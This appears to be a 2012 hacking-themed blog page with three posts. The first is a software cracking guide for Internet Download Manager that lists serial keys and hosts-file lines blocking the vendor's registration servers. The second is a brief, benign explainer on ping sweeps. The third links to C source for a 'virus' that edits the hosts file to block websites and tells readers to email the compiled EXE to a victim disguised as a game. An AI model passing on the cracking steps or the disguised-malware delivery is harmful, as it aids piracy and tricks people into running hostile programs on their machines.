Thursday 9 February 2012

How to install full version Internet download manager in your computer


Welcome to Hackers World!!!!!

Internet Download Manager is a download (full version) accelerator. By using this software we are able download from the Internet at a high speed. But when we are downloading the software from its official site it is not a full version. That is a 30 day trial pack. After these days are past it will ask you to enter serial key or to buy. So here is the process to make any downloaded IDM full version. After making this it will be registered for lifetime and not ask to register it further.



Process:


1. Download latest version of IDM from here 
3. After installing the IDM click on "registration" on the menu bar.
4. When you click on registration, now a new window will be open ask your First Name, Last Name, Email Address and Serial Key.

5. Enter your First name, Last Name, Email address in the required field.
6. In the serial key field enter any of the following given below

     RLDGN-OV9WU-5W589-6VZH1

     HUDWE-UO689-6D27B-YM28M

     UK3DV-E0MNW-MLQYX-GENA1

     398ND-QNAGY-CMMZU-ZPI39

     GZLJY-X50S3-0S20D-NFRF9

     W3J5U-8U66N-D0B9M-54SLM

     EC0Q6-QN7UH-5S3JB-YZMEK

     UVQW0-X54FE-QW35Q-SNZF5

     FJJTJ-J0FLF-QCVBK-A287M


    And click on ok to register.

7. After you click OK, it will show an error message that you have registered IDM using fake serial key and IDM will exit.



Now the actual hacking process starts:

8. First of all go to "C:/" drive then go to "Windows" Folder and then go to "System32" folder and then go to "Drivers" folder and then go to "Etc" Folder.
    Path is: C:\Windows\System32\drivers\etc
    or Simply "C:\Windows\System32\drivers\etc" pastes this (without quotes) in the address bar and hit enter. It will open the required folder.

9. In the Etc folder you will see the hosts file. Open the file with notepad.

Now copy the below lines of code and add to hosts.:


127.0.0.1 tonec.com

127.0.0.1 www.tonec.com

127.0.0.1 registeridm.com

127.0.0.1 www.registeridm.com

127.0.0.1 secure.registeridm.com

127.0.0.1 internetdownloadmanager.com

127.0.0.1 www.internetdownloadmanager.com

127.0.0.1 secure.internetdownloadmanager.com

127.0.0.1 mirror.internetdownloadmanager.com

127.0.0.1 mirror2.internetdownloadmanager.com


10. After adding these codes, save the notepad file. And exit from there.

Reboot or restart your PC. After restart now open your IDM it will be full version and not ask you to register.



Thanks for Reading This Article .Hope you will like this…….

Be a Good Hacker and save the nation!!!!!

Thanks & Regards
Tarun Arora


INTRODUCTION TO PING SWEEP


Welcome to Hackers world!!!!!

Before writing about Ping sweep, i would like to introduce Ping. Ping is a network based utility which is used to know if a host is alive or dead on the network. if we get the response it means website is live. You can check for a system by its IP address or a website by its domain name. We can use this program to detect host like website, computer system, printer, network or any device.


Ping Sweep :Ping Sweep also known as ICMP sweep is a network scanning technique which is used to determine which of a range of IP addresses map to live hosts. As we have seen in Ping, which is used for single computer. This is used for a range of IP address for various computers. ping sweep consists of ICMP (Internet Control Message Protocol) ECHO requests sent to multiple hosts. If a system (HOST) is live, it will reply with ICMP ECHO reply.
There are a various tools available that can be used to do a ping sweep, such as fping, gping, and nmap.

Download Fping here: http://fping.sourceforge.net/


Thanks for Reading this article .Hope you will like…..



Be a good Hacker and Save the Nation!!!!!


Thanks & Regards
Tarun Arora


Saturday 4 February 2012

How to create a virus in “C” to block websites


Welcome to Hackers World!!!!!

Today i am going to write a post on a simple virus written in C. It will block websites on your computer system. I am implementing that process by a C program to create it as a virus. Once the virus is clicked, it will block the some specific websites on victim's computer. The website which you want to block is mentioned in the source code of the program. Change the list according to your choice.


Download source code of Virus Here:

http://www.ziddu.com/download/18504818/Virus-createdbyTarunArora.rar.html


How to use:
  • You need to have a C compiler for that.
  • Compile and build the C program and generate the EXE file.
  • Run the EXE on your computer to check it's working. 
  • Go to the browser and try to open google or facebook. ;)
  • to unblock those websites Just delete the new entries in the file hosts created by this virus.  C:/windows/system32/drivers/ect/hosts
  • Now send this EXE to the victim through the email as a game or any other software.



THIS IS FOR EDUCATIONAL PURPOSE. PLEASE DO NOT USE THIS TO HARM ANYONE

Thanks for Reading This Article. Hope you will like…


Be a Good Hacker and Save the Nation!!!!!

Thanks & Regards
Tarun Arora